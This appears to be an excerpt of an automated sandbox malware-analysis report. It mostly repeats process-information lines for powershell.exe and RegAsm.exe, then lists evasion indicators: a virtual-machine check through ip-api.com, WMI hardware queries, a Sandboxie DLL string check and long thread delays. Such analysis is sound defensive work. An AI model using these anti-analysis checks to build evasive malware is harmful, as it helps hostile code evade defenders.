Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000004.00000002.1545150331.000001A8E9449000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2697144825.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002C21000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 1180000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 4BF0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1564	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1813	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2859	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6881	Jump to behavior
